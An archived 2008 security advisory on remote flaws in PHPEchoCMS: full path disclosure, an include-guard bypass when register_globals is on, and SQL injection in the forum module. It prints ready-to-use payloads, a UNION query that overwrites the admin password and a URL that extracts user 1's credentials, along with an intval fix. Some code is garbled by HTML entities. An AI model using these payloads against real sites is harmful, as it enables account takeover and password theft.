Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:18885
HistoryJan 17, 2008 - 12:00 a.m.

PHPEchoCMS Multible remote vulnerabilitis

2008-01-1700:00:00
vulners.com
20

Hello,

PHPEchoCMS Multible remote vulnerabilitis

Discovered By : HACKERS PAL
Copy rights : HACKERS PAL
Website : http://www.soqor.net
Email Address : [email protected]

fiest thing …
full path
kernel/init.php
modules/admin/index.php

every file to be included has to have the value of the variable $BASE_LOAD
but if the register globals is on then you can use in the browser like this …
modules/files/index.php?BASE_LOAD=1

it will continue … and other files too

modules/forum/index.php
lines [31-49]
if (@$_POST['post']=='thread')
{
if (@$_POST['id'] && $_POST['title'] && $_POST['contents'])
{
// Add the thread to the specified section
$ins = "INSERT INTO `".PREFIX."threads` VALUES ('', '".addslashes($_POST['id'])."', '-1',
'".addslashes($_POST['title']).
"', '".str_replace("\n", "<br>", addslashes($_POST['contents']))."',
'".$_SESSION['username']."','".date("d-m-Y H:i")."', '0')";
$res = query($ins, 1);
$ins = "UPDATE `".PREFIX."sections` SET `lastdate`=".date("d-m-Y H:i")." WHERE
`id`=".addslashes($_POST['id']);
$res = query($ins, 1);
$nb = query("SELECT max(`id`) FROM `".PREFIX."threads`", 2);
redirect ("index.php?module=forum&show=thread&id=".$nb);
}
else
{
$content = $mlang['017'];

     }
}

see
$ins = "UPDATE `".PREFIX."sections` SET `lastdate`=".date("d-m-Y H:i")." WHERE
`id`=".addslashes($_POST['id']);

could be modified to an update query by posting value of id as next
id=union update members set password=[value] where id=1

offcourse value here should be md5 hash … and no brackets so the query will be ok :)

lines[138-142]

elseif &#40;@$_GET[&#39;show&#39;]==&#39;thread&#39; &amp;&amp; $_GET[&#39;id&#39;]&#41;
{
         // Show a thread and its replies &#40;child-threads&#41;

        $thread = query&#40;&quot;SELECT * FROM &#96;&quot;.PREFIX.&quot;threads&#96; WHERE id=&quot;.addslashes&#40;$_GET[&#39;id&#39;]&#41;, 4&#41;;

replace with
elseif (@$_GET['show']=='thread' && $_GET['id'])
{
// Show a thread and its replies (child-threads)

        $thread = query&#40;&quot;SELECT * FROM &#96;&quot;.PREFIX.&quot;threads&#96; WHERE id=&#39;&quot;.intval&#40;$_GET[&#39;id&#39;]&#41;.&quot;&#39;&quot;, 4&#41;;

exploit
index.php?module=forum&show=thread&id=-1%20union%20select%201,2,3,username,password,username,password,8%20from%20phpecms_users%20where%20id=1/*

WwW.SoQoR.NeT